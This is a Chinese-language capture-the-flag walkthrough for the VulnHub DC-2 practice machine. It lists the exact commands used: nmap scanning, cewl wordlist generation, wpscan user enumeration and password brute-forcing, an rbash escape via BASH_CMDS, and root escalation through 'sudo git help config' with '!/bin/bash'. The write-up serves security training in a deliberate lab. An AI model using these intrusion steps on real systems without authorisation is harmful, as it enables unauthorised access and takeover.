一、環境搭建
1、官網下載連接:https://www.vulnhub.com/entry/dc-2,311/
2、下載之后,使用Oracle VM VirtualBox導入靶場環境
3、為了正常練習,將靶場的網卡模式設置為橋接模式,啟動即可
二、靶場攻略
1、使用nmap快速掃描的命令:nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.1.0/24,識別到靶場主機ip
2、使用命令:nmap -A -p- -T4 192.168.1.5,探測靶場突破口
開放了7744端口號,服務為ssh,80端口,服務為http
3、訪問80端口,尋找進一步突破口,直接使用ip訪問會跳轉到http://dc-2/,所以添加hosts文件,讓這個跳轉域名來訪問靶場ip
在/etc/hosts文件中添加域名
成功訪問域名,並得到flag1
4、根據提示,提示使用cewl來生成字典
輸入命令:cewl dc-2 > password,爬取dc-2頁面,將關鍵字生成字典寫入到password文件中
5、查看網站源碼,發現網站中URL目錄結構為wp-*的,猜測網站為wordpress搭建的
6、使用wpscan這個專門掃描檢測wordpress搭建的工具來查看是否存在已知漏洞
使用命令:wpscan --url dc-2,掃到wordpress的版本,ip地址等信息
使用命令:wpscan --url dc-2 -e u,用戶信息枚舉,得到幾個可以用來登錄的賬戶
7、使用得到的用戶名,創建一個username用戶文件.
使用命令:wpscan --url dc-2 -U username -P password,使用得到的用戶名還有cewl得到的密碼嘗試爆破,成功爆破出兩個賬戶密碼
8、因為wordpress的后台登錄目錄是公開的,所以直接訪問/wp-admin,成功出現后台登錄界面
使用爆破的賬戶密碼,登錄成功
在jerry賬戶中,得到flag2
9、根據flag2的提示,找另一個入口,想到ssh服務,使用命令:ssh tom@192.168.1.5 -p 7744,成功登錄ssh
得到flag3,因為cat無法使用,所以使用vi命令,得到提示
10、因為使用tab,cat等命令無法使用,所以知道當前賬戶是受限制的,所以可以進行rbash繞過
輸入以下命令:
BASH_CMDS[a]=/bin/bash
a
/bin/bash
export PATH=PATH:/sbin:/bin
輸入之后,可以正常使用受限制的命令了
11、進行收集信息,使用命令:ls -alhR /home,得到flag4和jerry賬戶信息
12、根據flag4的提示信息,明顯是要使用git提權
使用命令:su jerry,切換到jerry賬戶
使用命令:sudo -l,查看可以無密碼使用root權限的命令,果然是git
13、查詢到git提權的方法
輸入命令:sudo git help config
之后直接在出現的help界面,輸入 !/bin/bash,成功提權
切換到root賬戶根目錄,成功得到最后的final-flag.txt
完